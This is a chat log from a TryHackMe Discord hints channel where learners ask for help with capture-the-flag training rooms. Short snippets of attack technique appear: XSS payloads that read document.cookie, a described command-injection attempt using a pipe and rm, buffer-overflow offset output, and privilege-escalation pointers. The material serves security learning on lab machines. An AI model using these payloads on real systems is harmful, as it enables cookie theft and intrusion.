#room-hints

yes

i had a revelation

the final one is trying with php shell

another level

i'm still trying to change de directory

hey, @oblique cliff how can i change my dorectory what i try doesn't work

I'd recommend doing the Learn Linux room

...

i can't remeber

Please read the text in the room

It tells you what path to use.

Like, explicitly

sorry i read another time

Edit: Removed

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@stuck fractal It was less a request for a hint and more clarification of a possible bug :p

You're in the hints chat.

Aaah - Fair enough

After a little less than 2 hours i succefully finish the room. Thanks @oblique cliff // @stuck fractal.

(2 hours only for the task 5 question 2 because i don't know how to read, thx a lot !)

Woot!

2 hours better than 2 days!

If it makes you feel better I did James’s box for like 3 hours and got hard stuck

So it happens 🤷🏿‍♂️🤷🏿‍♂️

i feel better now, your amazing thanks!

https://i.imgur.com/ONNL1y4.png?

Check your VPN!

🤔

it's connected

Not properly, clearly

wdym https://i.imgur.com/l5yXMkV.png

Don't trust that

You're getting timeouts

That's a network issue

Network = VPN

Therefore you need to check your VPN

ugh

what should i do

!vpnscript

how do i download the script bruh

Wget, copy paste, curl, write it yourself

Many different ways

Be creative 🙂

can i get it with the terminal?>

Wget, copy paste, curl, write it yourself
@oblique cliff

All of these can be done in a terminal

ugh

imma search on google

:))

That should always be the first thing you do

yup

For anything you encounter in life

lmao

I’m not kidding

ik

google is the answer

Hi got problem with the crontab used from last privesc in Tartarus machine

That's going to be an error in what you put in the script

bruh my vm just crashed

ffs

That's going to be an error in what you put in the script
@stuck fractal I used this that found on a writeup, just changed IP/Port

There's a random newline in there

I'll check it, thank you

i'm at task 8 on zthweb2, i know how to use wfuzz but i cant seem to find what wordlist i should use to get the right username/note.txt

could anyone nudge me towards the right wordlist?

Did you try big.txt like the previous task uses?

yeah weirdly did give me anything

I haven't done it, so I'm just spitballing. Maybe directory-2.3-medium?

yeah i'll give it a shot

got it, it wasnt a typical username lol

🙂

im not asking for hints, but should i get user -> root for internal room

That's the normal pattern

Can someone give me just an additional hint on where the 2nd flag is in room Blue, Task 5? I seem to be only missing the 2nd 😅

it should be somewhere in Administrator @white salmon

Okeeee thanksss

need hint for relevant room

!rule 13 🙂

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

If you give us more information sure

Room? Screenshots?

room: diana Initiative ctf

Access page lies but you are connected in this case

You still haven’t answered which room you’re trying to ssh into

Title: [Task 12] [Easy] [Networking] Sharing is Caring
IP: 10.10.74.170

Networking doesn't have 12 tasks

Networking doesn't have 12 tasks
@astral smelt Are you refering to diana initiative ctf room?

https://tryhackme.com/room/dianainitiativectf

The room is private

@tame kayak what are the credentials you are using?

The room requires you to use nfs so I'm a little confused on why you need SSH

Ohkay I am not sure about ssh thing I was just making attempts to connect to it

Could you help me a bit more

Why would you connect to it?

None of these tasks require SSH

And even if it does, it is pretty self explanatory

As there is a file which contains the credentials

So you're meant to use those credentials to ssh into it

You haven't even scanned the machine, no wonder you can't log in.

Please actually follow the room before coming here.

Sorry

i am trying to solve relevant and looking for a hint, i tried everything enumerating but i got the credentials and was not able to use remmina and evil-winrm even rdp is there and tried enum4linux,rcpdump no luck

hello, i'm just stuck on the "Learn Linux" room Task 11. They ask me to creat "noot.txt" and to run it but .. i can't : acces denied ? can somebody help me ?

You need tô change permissions

Search on google how to change permissions to execute file linux

Blacklist you can DM me for a very light hint if you want.

i can't even change permmision

Eait

iirc you won't be able to modify the executables

and also just providing a path won't create a file

You shouldnt execute a text file

I'm in my phone right now so its hard to get in tryhackme

But read the task again carrefully, i'm pretty sure It doesnt tell you to execute noot.txt

true

they only ask me to create noot.txt

not to run it, they ask me to run shiba1. Thanks @woven mirage

/room/webappsec101 [Task 6] - Question 1 https://tryhackme.com/room/webappsec101

So we found the page where you can check your password (secured or not), and it displays us the command grep which is used to check the password
So we've tried adding some code in the field with the pipe and rm command, but everytime the site crashes, have you hever heard about it ?

Any heads up on Internal ?

Not going to give hints on that one until I stream it this week as it's rated hard.

not to run it, they ask me to run shiba1. Thanks @woven mirage
@rough helm it says to run ./shiba1 not run the noot text file. The shiba1 script looks to see if there is a noot.txt file created, if there is one, it gives you the flag

Hi the rdp and evilwinrm is not work on relevant

Ok

i am using the credentials i found

is it meant to be like that

¯_(ツ)_/¯

Well a lil hint maybe ?

No

If you would like a hint you may DM me for one.

❤️ Internal box

Yea?

😀

just done with the box

😄 nice box.. really love it

Awesome. Could leave some thoughts in #522158404614225920

I'm glad you enjoyed it.

@rough helm it says to run ./shiba1 not run the noot text file. The shiba1 script looks to see if there is a noot.txt file created, if there is one, it gives you the flag
@frail void i run /home/shiba1/shiba1, and it work. I understand better how it works now, thanks to you.

Ok I got a new issue. I got tge credentials but I can't seem to log in.

How to reset my progress in tryhackme ?

I want to start everything for beginnings

Starting everything from beginning is a little hard you might as well just make a new account.

Usually rooms can be reset by asking the room owner nicely to reset your progress.

On top of that this is the wrong channel to discuss this ;)

sorry to bother, but how do I see the content of a txt file in a windows shell?
cant seem to find something with my googling skills ._.

more file.txt

type file.txt

https://stackoverflow.com/questions/17217476/how-do-i-display-a-text-file-content-in-cmd first response btw

In the future, a search such as the following would find the same. windows how to read text file

thanks

Rly... What is the full name of James Duncan Davidson..?

@patent token Nice for machine , i got it

🙂

Congrats. Can leave some thoughts in #522158404614225920 if you want. It helps us as room creators. 🙂

what have you tried

I'm keeping hints pretty close to the chest on this currently.

Are you otherwise able to execute commands?

mayor is that for me? idk which box he's working on, ill stop if its one of yours

I think it's Relevant.

gotcha, yea ill leave it to you then 🙂

And can we please delete the comments that include the directory names?

Thank you

Thanks.

Mayor are you still going to give that tiny hint by chance

If you send me a DM with where you are I'll consider it. 🙂

Awesome, I'll be right over

👀

were is my message?

I had it deleted since it contains information pertinent to the challenge which shouldn't be shared in public yet.

Ha, ok i'm sorry i did not know

Are you able to execute any other commands? Please don't share them, just a yes or no will work.

yes

I'm able to change directories to that user in the challenge. Just checked it.

Room: Vulnersity
Task: 4
Question: "Try upload fa few file types to the server, what common extensions seems to be blocked?"
Answer format: .***

I tried a few files with different extensions, but every extension I tried was blocked.
What exactly does the question mean?

What common extension (for webapp pentesting) is blocked.

ah, that sounds better, thanks

You can DM me if you want.

But try to keep spoilers to a minimum. There's a bit of one in your comment.

okay deleteing it..

I have this doubt... I'm currently trying tryhackme CTF challenges and was giving a try to host exploitation challenges. So figuring out ssh username and passwd is the something that's part of the task? Just wanted to know if I'm on the right task.... this is all new to me 😓

I was trying out the easy one first

You will need to tell us what room

There's 241 public rooms on the platform

Okay sorry, DianInitiativeCTF which is currently running....

That room

That's not a public room

Okay so is there any channel where I can contact the admin for the challenges of that room?

Isn't there a discord for the event?

Ohh okay I guess I got redirected here....Thanks a lot

Hi. Any hint for Anonymous Playground room? Found some cookie and hidden site, but dont know hot to get access

need help with https://tryhackme.com/room/malresearching task 5

How do i fix this ?

It's one or the other or the other

One at a time

| is generally recognised to mean OR

As is ||

Pick one at a time

Got it i though it can take all at once

thanks

no luck still am i missing something?

You have mis spelled algorithm

oops i tend to copy-paste from the room 🤷

I don't know if this is the right place to ask, I have completed Nmap and I am doing networking from blue primer series. My question is what is this blue primer and red primer? I see there are a path called primer series, is it related to that?

Also, I'm answering all the questions through googling. Is there any kind of video or lecture that are missing from free subscibers?

They are Dark's beginner rooms

If you subscribe, many rooms have videos

But you should be googling and reading documentation. That's what most of hacking is about

Yeah, I am answering every questions through google search. It's like a find and answer game and I am liking it.

So I'm not missing anything, good to hear!

If you're finding them through like, blog posts dedicated to the rooms

Then that's probably not so good

But reading documentation or stack overflow posts is good

I am avoiding blogs posts called write ups.

After completing Nmap room, I found one in the THM blog. So I'm aboiding those posts carefully. ❤️

Any hints for Relevant? Got some creds but not sure how to test these out for any running services

You may dm me for a hint.

Is it a tech glitch or am I doing something wrong ?

im trying the easypeasy room

and have connected to the ssh

and i found || .mysecretcronjob.sh ||

never mind i got root

hmm check your port and ip in php shell @shut pollen

Done that

It's all correct

It's showing some kinda funky daemon issues

i didnt play box , but you should check if there is some firewall rule that blocks outbound traffic , or something like that

New room

No hints here. Please respect the rule? @shut pollen

I'll be removing that in a jiffy.

my terminal freeze when i type that. should i be in a specific CD or i did something wrong i mean...i don't understand i have the password but can't use it cuz my terminal is not doing anything

https://i.imgur.com/ASPGee7.png **

Check your VPN

Timed out is a network issue

i forget the command to find the password after connecting on CD https://i.imgur.com/wGWd7o4.png

cat

thanksssssssssss

The fundamentals of linux will keep coming up

hey guys, i need help with ' Gotta Catch em All' of scripting room

wait!, seems it's working 😆 , i thought that the script wasn't working because i had no response but i leave it running and now i see that's printing something, gonna check it carefully

https://i.imgur.com/SYu3f3P.png can't usefind cuz it's not finding that file..

some hints? please

Which room @uneven nebula

learning linux or something, last challenge (bonus)

"Linux Walk Through"

Wait let me see, I can't remember lol

lmao

So, you need to access one of the users that can access to the /root folder

This was obvious

shiba4 maybe 🤔

I'll let you search ... 😉

:>

And the user's IDs are in a hidden file somewhere lol

Hello, i need a hit too. I can't find "shiba4" Task 33 "learning linux" room

and the file is hide ?

Use the find command

yes

i did that:>>

I'll help you in DM to prevent spoil and spam

the answer will be the biggest mindblow ever

Wut

No

Don't give answers

no no

i try find but doesn't work

Why iname?

and speech marks aren't needed

bc i searh a binary called "shiba4"

so i search by name

Also

You're searching in the home directory

How do you know it is in the home directory

idk

you've true

Then search everywhere

And supress errors

but i can't just search by name?

Yes you can

after 20 long minutes i succeeded

That image is a spoiler.

im so dumb

sorry

All good. Least you found it

yes

it wasn't easy

(for me)

Wasn't for me either

All start somewhere

Yes you're right

need help on https://tryhackme.com/room/toolsrus #10, don't know what exploit i need to use

anyone working on Spring? Need to bounce off couple of ideas...

for foothold

@alpine lantern still having trouble?

yep @ashen matrix

OK to DM?

sure

Hi everyone! Can anyone drop me a hint here?

I'm stuck after finding shiba4 and running it

when I run shiba4

That's the password

oh really?

of what user?

shiba4?

ok

lol

I was stuck forever

Delete the password please

deleted

Thank you.

thanks

anyone has any ideas how to exploit jenkins and stuff ?

Well, what have you done already?

have you done any sort of enumeration or research?

Well I used SSH tunneling to connect to it over as another user.

Well unless you have the creds, then maybe SSH isn't the right way

Umm........Credentials to what ?

oh wait it's a windows machine

right

They don't have SSH

lmao

Well , it's a Linux machine.

I am talking about Internal

OH

you should've said so in the first place

Yeah , my bad.

Any idea about the Jenkins stuff ?

I haven't done that room in particular

sry

what room

Internal

Room: Learn linux, Task 43: Find what's in /root/root.txt. Can anyone give me a hint, it says all information is in the room but I can't find it :/

What are your privileges ?

its hidden

u need to find it

Any hints on internal @heady anchor ?

its a new room

Can I DM you about this ?

@dim trail you have access to a few shiba users, check if there are any interesting files they have access to

alright

Any hints on internal @heady anchor ?
@shut pollen i am not sure if you can ask questions based on a new room

@white salmon any more hints you could give me?

Have you checked which uses own which files as he stated?

@ruby wraith specifically shiba2 if i recall

@trim haven i did, but i can't seem to find any intresting files that could help me

hey need hint on relevant

Mayor is the only one giving out hints

And as it is his room I think everyone should respect that.

So, I can ask him for hints

He's not online right now, I'll let him know to avoid pinging him.

Ok thanks @trim haven

anyone working on Spring? Need to bounce off couple of ideas...
@midnight lotus you can pm me

Hello, i block on the last task "bonus challenge" in the learn linux room, can somebody help me?

this one.

Look at files that are out of place that are owned by each user

I'm going to try

We need a command for that flag

hello guys can i ask a quick question on the https://tryhackme.com/room/relevant

i think something is wrong with the rdp kind of buggy

anyone having the same issue??

anyone give me ahint about internal rooms, stuck in ||jenkins||

hello guys can i ask a quick question on the https://tryhackme.com/room/relevant
@sinful plaza anyone with dsame issue??

Muzek, you may DM me for a hint.

p1d0f, you may DM me for a hint on Internal.

sure

@patent token i tried harder sir, nice machine 👍

🙂

Thank you. Would you mind leaving some words in #522158404614225920 ?

hey @patent token can i dm for hint ?

Really quick yea. About to have breakfast.

Mayor

Hints >> breakfast

It's a VERY generic hint more than anything.

hello guys I'm beginning in pentesting and I'm trying to achieve the agent sudo room. I'm just struggling to find the appropriate exploit to use for the privileges escalation; can anyone help me with a hint or anything please ?

why do we need # at the end of command injection in iot room?

Hi All, any hints on SET machine.... i have found two important files one with list of usernames and other hints towards usage of weak password.......however i have tried multiple password files against the user lists but no success......am i in the right direction or brute-forcing my way in is a wrong approach?

hi all!
can someone pls give me a hint for the root user on Wonderland room?
i have checked what commands i can run as other users with sudo -l. have no clue how to continue from here.

What user are you now? @marsh ravine

I'd recommend running some enumeration scripts to be honest

still alice, but i got the user.txt flag

You can't get straight to root. You can tun a single command as a different user with sudo and that's it. You're going to have to exploit that.

nothing special came on linpeas, thought i should continue with the "run python as rabbit" idea.

It's a single very specific command

And you'll probably have to do some research into python privilege escalation

thanks!

hey guys ,can i get help in room Cross-site Scripting , task 5 [DOM-Based XSS] , i did what the question ask 1 for get popup for my cookie and change the web for red but i didn't find the answer that fits the question

If you use the correct payload then you will be given a flag

In the networking room, does anyone have a hint for this question:

It's quite like the first

Not the same, but similar. Same class.

Thanks!

here what i get with no flag ,https://imgur.com/R43xiiV.png

Got it, thank you @stuck fractal

@woeful sky dismiss that

i did

Then either you see a flag, or you didn't use the payload that it wants

i check in writeup and use there payload and still same result you think maybe restart the machine will help?

Worth a try.

Writeups aren't always correct though

"keyword.innerHTML = <script>test" onmouseover="alert(document.cookie)"</script>" i use this payload any idea where wrong?

Don't use onmouseover

It's in a script

Therefore you don't need to declare it as an attribute

i didn't solve it yet , "<script>xxx" onerror ="alert(document.cookie)"</script> .

You're in a script tag

You can just write javascript

thanks

Hi all, anyone can solve jwt challenge?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

In the blue room how can you find flags?

The locations are hinted to in the hints

I found the first flag and then made a search for all file starting by flag

Need some help for RELEVANT. I think I am on the right direction but need some advice please 🙏🏻

You may DM for a hint.

Hi everyone, I could use some help in room ZTH: Obscure Web Vulns. In detail I am stuck at task 14. The JWT challenge. Someone here who could help me out...

Follow the steps exactly and it will work

is the solution a complete JWT with the same payload and a new signature? Isnt this doable in jwt.io?

I don’t remember. The steps from the previous task tell you exactly how to do it

where i should search the credentials? -- Windows10PrivEsc Task 9

Roome Gotta Catch'em All! > Last flag > root user's favourite pokemon

Do I need to do privilege escalation to get access to the file?

Normally if you want root's files

Hello, can somebody help me i can finish the "Learning Linux" room, last Task the bonus challenge.

Are you looking for a hint or help

Thanks for ur message @trim haven

somebody already help me.

but Thanks anyway

anybody did overflow 7? wanted to ask a question the final step

the room Learn Linux (zthlinux) has no form to place the answers or the finnal chanlege

That's a bug, #site-support

yes, just checked i placed it in the wrong room.

On nmap question 12 I've been stuck for half an hour reading man nmap, can anyone help?

I already put -sU and a lot of other variants

That's a bug, #site-support
@stuck fractal oh wow I finished it yesterday I thought that was how it was supposed to be! haha hope I can replay it when it gets fixed

https://www.google.com/amp/s/www.poftut.com/how-to-scan-all-tcp-and-udp-ports-with-nmap/%3Famp

@lost delta

thanks so much!!

pls hint anonymous playground thingy

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Currently on "Linux Challenges" room and am on this question

Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.

This is the command I'm running:
||find / -type f -exec grep "^4bceb.{27}$" {} + 2> /dev/null ||

But there is no output and it is just hanging.... or its just taking forever, is this unexpected?

You're searching through every single file on the file system

Am I supposed to be?

There's not really a better way here

So it will take a long time

So patience is required and expected, not a sign that I'm doing it wrong, correct?

It will take a long time. I'm not 100% on your regex but it looks like a good start. The + confuses me there though

The + is part of the find command, not the regex. + is new to group filenames rather than running one at a time.

Welp, good luck

-exec command {} +
              This variant of the -exec action runs the specified  command  on
              the  selected  files, but the command line is built by appending
              each selected file name at the end; the total number of  invoca\u2010
              tions  of  the  command  will  be  much  less than the number of
              matched files. 

Thanks!

Is it supposed to take 2 hours to grep through all the files? Do I need more patience?

Ok that seems a little steep

That's what I was thinking..... I don't want to stop the command. And I thought I tested the command thoroughly in alice's home dir with a different string

||find / -type f -exec grep "^4bceb.{27}$" {} + 2> /dev/null || is my command

The question was changed as well, it was even more impossible before

is it okay to ask for hint on relevant yet ? did some intial enumeration but cant find as solid/functioning way to utilize my findings

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Hi, I am currently trying to access a jenkins instance that is being ran through docker. I am having trouble accessing the jenkins console/panel. I've been desperately google searching ways to access an internalized jenkins through my browser but no luck. No tools on the machine either to interact w/ jenkins

I believe I have to setup a proxy possibly?

I am trying to solve Git Happens room.
I just need a little hint
If anyone can, I am very pleased
@pure plaza no help or hints for new room that's the rule

I believe I have to setup a proxy possibly?
@maiden stream I’ll be honest I have no clue what you’ve been looking at but I didn’t do that on Jenkins

DatBoiRalph you can DM me for a hint.

Anyone a hint for RELEVANT? I found some ports & creds but now I'm stuck

You may DM me for a hint.

@patent token may i also dm?

You may.

Thank you

May I also slide?

Huh?

@patent token i think he/she means could he/she dm too?

@patent token Thank you! Really appreciate the help

You're welcome. Enjoy!

hi in the bufferoverflowprep room task 2 I forge the payload for figuring out the offset that overwrites eip but even if the app somewhat freezes only EBP and EBX got overwritten with a cyclyc pattern

0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
0BADF00D Cyclic pattern (normal) found at 0x0198f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0054394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00544d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack (+- 1100 bytes) - looking for cyclic pattern
0BADF00D Walking stack from 0x0198f5e0 to 0x0198fe7c (0x0000089c bytes)
0BADF00D 0x0198f7b4 : Contains normal cyclic pattern at ESP-0x278 (-632) : offset 2, length 632 (-> 0x0198fa2b : ESP+0x)
0BADF00D 0x0198fa30 : Contains normal cyclic pattern at ESP+0x4 (+4) : offset 638, length 462 (-> 0x0198fbfd : ESP+0x1d2)
0BADF00D [+] Examining stack (+- 1100 bytes) - looking for pointers to cyclic pattern
0BADF00D Walking stack from 0x0198f5e0 to 0x0198fe7c (0x0000089c bytes)
0BADF00D 0x0198f6e4 : Pointer into normal cyclic pattern at ESP-0x348 (-840) : 0x0198f7d0 : offset 30, length 604
0BADF00D 0x0198f6f4 : Pointer into normal cyclic pattern at ESP-0x338 (-824) : 0x0198f7d0 : offset 30, length 604

Could you provide a screenshot

Hi I am working on the Anonymous V6 room. I think I have enumerated the machine to the max. || I am looking into abusing the shared folder but I can not work out how as it is a read-only folder || Can someone supply a hint if that is correct, and if so what I should be Google Searching for more info?

which part should i screenshot ?

This doesn’t work well on mobile

ah alright

i am using the python script that recommended in the room

calculated the payload and generated a pattern of 1100bytes

the wierd thing is that it finds the offset

0BADF00D Cyclic pattern (normal) found at 0x0198f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0054394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00544d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)

634

however it aint finds it in eip :E

Instead of that method why don’t you try doing the pattern offset module in metasploit?

I’ve never used the tool you’re using so I wouldn’t be sure how to debug it

that's generate me the offset

i mean that's the output of the msf-pattern-create

-l 1100

or the 2 thing are not identical ?

alrite that's really wierd 😄

i have changed the pattern

msf-pattern_create -l 1100 -s ABC,def,123

and now it breaks in the "right" way

and i can see the eip corrupted

0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
75300000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D [+] Examining registers
0BADF00D EIP contains normal pattern : 0x65433265 (offset 1687)

however

that's not the number that the room wants as a solution..

now u tell me whats going on ? 😄

The create is the same. The pattern find just finds the match

Idk what you’re doing right there to find the pattern

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100

the run the exploit.py

and in the immunity debuuger : !mona findmsp -distance 1100

0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
75300000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x01b4f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0086394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00864d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)

it aint shows EIP

corrupted here see ?

You can stop copying and pasting that

I can see it

/usr/share/metasploit-framework/tools/exploit/pattern_match.rb -l 1100 -q “pattern”

Do that one instead of using Mona to find the offset

i should run that against some sort of memory dump i suppose

w/e just let it go.

imgona try to land the eip in the old way

What I’m describing is the old way...?

just trying to overwrite EPI instead of the fancy diff scripts and do the interval halving to find the right offset. no idea why it is breaking from +400bytes of AAAAs and not breaking from creatpattern.rb. makes 0 sense.

unless something is terribly wrong

I'm confused here.

It's clearly showing you the offset at 634.

apperently it is the lack of my understanding, but shouldn't the mona script detect that EPI is overwritten with a cyclic pattern ?

i mean that's my problem that it prints a few points that got overwritten

0BADF00D Cyclic pattern (normal) found at 0x01b4f7b2 (length 634 bytes)

cause in the OVERFLOW1 challange I could overwrite EIP with AAAAAA 4141414141 and I could found it

It's just taking the register values upon crash and reporting them. I honestly didn't use the mona script for this as it's just a ton of unnecessary work.

alright, my method here i somewhat same what you are saying find a byte array that overwrites with a known value the EIP register, however this is what I am failing to achieve in OVERFLOW2 task :/

anyway it is clear that i need to learn more and ask less. thx for the inputs tho and sorry about the fustration

So in that image your EIP is overwritten by your junk bytes (a's). If you do the same thing, but this time replace the A's with the character string you receive from pattern_create, your EIP will reflect the exact crash point in those characters.

Alternatively, the register there should show the same thing using the python script as well. When all else fails, use what you know.

yupp but in challange 2 i cannot manage to do that

I'm not sure why to be honest.

me neither 🙂

Anyone On Git Happens?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@mystic walrus ^

I’m Asking About The Room Git Happens

alrite all : I am very sorry, seems like I have tried with too big payload :E

did some stackframe violation or dunno

12,400 is probably way too much.

agreed.

if i stick to the 400 recommended overflow

I just ran this quick as I have a local copy, and it gives me the EIP value there.

1100 works fine with OVERFLOW2

right, as always i was the dumb dummy

very sorry for flooding the chat.

You're not a dumb dummy. Don't be down on yourself. This stuff can be difficult at first.

anyway thank you for the help. are u using windbg there ?

The image is the crash details from running the oscp.exe file with wine.

Actually does a good job of feeding back the crash registers.

great! so wine can be a good idea to debug winbinarries

thank u all!

If you know how to use it. I would stick to Immunity Debugger for now.

i guess i just need to keep trying harder 🙂

thx

Hi everyone, i'm stuck in the hatter user on wonderland room. I guess i need to switch to the tryhackme user, but i have no clue how to keep going. The only thing i had in mind is that the webserver is running by the tryhackme user. Can someone pls give me a hint? Maybe some reading materials?

Hi everyone, i'm stuck in the hatter user on wonderland room. I guess i need to switch to the tryhackme user, but i have no clue how to keep going. The only thing i had in mind is that the webserver is running by the tryhackme user. Can someone pls give me a hint? Maybe some reading materials?
@marsh ravine may I ask for an image pls 🙃

@heady anchor sorted dw

@white salmon if you overflow it too much it may cause an error which changes the return address to the location of the error. So you should go too far over

Oh shoot

I read the wrong message

Proceed with your helping my bad 😂😂

Can you remove that weasel

It says the answer of what to do

Sure

Thanks 🙂

Wouldn’t have been a problem it just said which user and everything

I speak too much about it sorry😅

No worries the help is appreciated 🙂

@marsh ravine may I ask for an image pls 🙃
@heady anchor
Sure, but of what?

The prosses running?

@marsh ravine You currently have access to the hatter account? What have you checked within hatter?

@marsh ravine u getting hatter user now?

@marsh ravine You currently have access to the hatter account? What have you checked within hatter?
@ashen matrix
I have ran linpeas, nothing special popped out. Checked if i'm in the sudoers list, i'm not. And the only thing i found is the file running as the http server+tryhackme user is the one running it.

@marsh ravine u getting hatter user now?
@heady anchor
I'm already hatter

@marsh ravine You need to check more

You are missing something specific

@marsh ravine try suid3num.py

need hint for internal, im stuck ..

Lemme give u some hint cmdick

U will need related capabilities for Perl

That's the biggest hint

@patent token Someone wants a hint on your room :)) (sorry for pinging I don't want it to get lost in chat)

Ok, thanks!

And one more

@marsh ravine

Remember to check some cheatsheets

🙃

👍

You can DM me FrostRekt for a hint.

Made it, thank you!
Learned somthing new😁

any clue pls

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@patent token can i DM internal room ?

You may.

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Delete all that please @wooden estuary

and @craggy pulsar They're back again...

wats wrong, ive explained my problem to the fullest @trim haven and i'm sticking to this channel only

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@wooden estuary Hey! You should read the #rules section of this Discord. Sorry if we're coming across harsh, it's just we get so many people everyday it's hard for us 😦 We can't provide help for that room until a certain number of days is up, as its so new. We are a learning platform first, but we have to respect the competitive nature of it too 🙂

I get u now @craggy pulsar , I've deleted tat

I get u now @craggy pulsar , I've deleted tat
@wooden estuary Thanks a lot ❤️ 🙂

We can't provide help for that room until a certain number of days is up, as its so new.
I've just read the whole channel again and didn't see any mention of this though. 😕
Is there a set, specific number of days for a room after which you can provide/get help? How many?

Depends on the room creator but a minimum of 48 hours

oh right
I didn't see the whole context, I imagined it would be in the range of 20, 40, 80 days

2 days seems kinda obvious imo

Aha

Anybody did "ConvertMyVideo"? was wondering how to go from the website source code to the actual attack. how would you figure out that you need to attack that way

Hello, can somebody help in the "Linux Challenges" room task 2 question #4 can't find the "cron jobs".

@rough helm explain?

Have you googled where to find cron jobs

Yes, but google tell me to go in /etc/ cron.d cron.daily ...

can acces to this file

already try

Well you know cron jobs are sored in a file called crontabs

Maybe look for crontabs

crontab need root acces or be in the crontab group

I know where to look now, thanks for the hints!

In hackpart room, i answered windowscheduler.exe at below ques ( Further enumerate the machine.

What is the name of the abnormal service running? )

but still wrong

wscheduler.exe

That's not the name of the service, that's the name of the executable

what do u means ?

Message.exe

?

These are all names of executables

Not the name of the service

ok

I got

Thanks @stuck fractal

what ||setgid bid set|| mean pls?

https://www.google.com/search?q=what+does+setuid+bit+mean+linux

Was just about to send that aha

Um, I see thank you.

anybody available for a question on ConvertMyVideo?

just ask your question here

Anybody did "ConvertMyVideo"? was wondering how to go from the website source code to the actual attack. how would you figure out that you need to attack that way
@empty heath @solemn smelt

@empty heath no need to dm

have you looked at a writeup to see how they got to the attack?

yes, i get it

what I don't get is how you get from the info we have, to the decision to do the attack

so i needed someone who had done it, as the writeups don't have that (unfortunately)

https://leosmith.xyz/blog/convertmyvideo-tryhackme-writeup.html

this writeup does a good job of explaining it

@trim haven The minimum wait time is 3 days, not 2 I believe 👀

need hints for git happ

need hint for "Ra2"

i've got ||certs|| ||converted pfx into pem files|| not sure what to do next 😄

Hey people, Are there any rooms related to Drupal?

If you go to hacktivities, and search drupal?

There are none. Is anyone planning to create one?

Hi. I need help with harder room. I got a shell but cant do anything with that becouse of "sh: w: not found". Cant' run any commnad

Just curious, for mrrobot, are we supposed to try to get into the user on the machine? I feel like I followed a red-herring

@vast prairie Yes.

@rose root use a different shell? bash instead of sh? how did you get the shell?

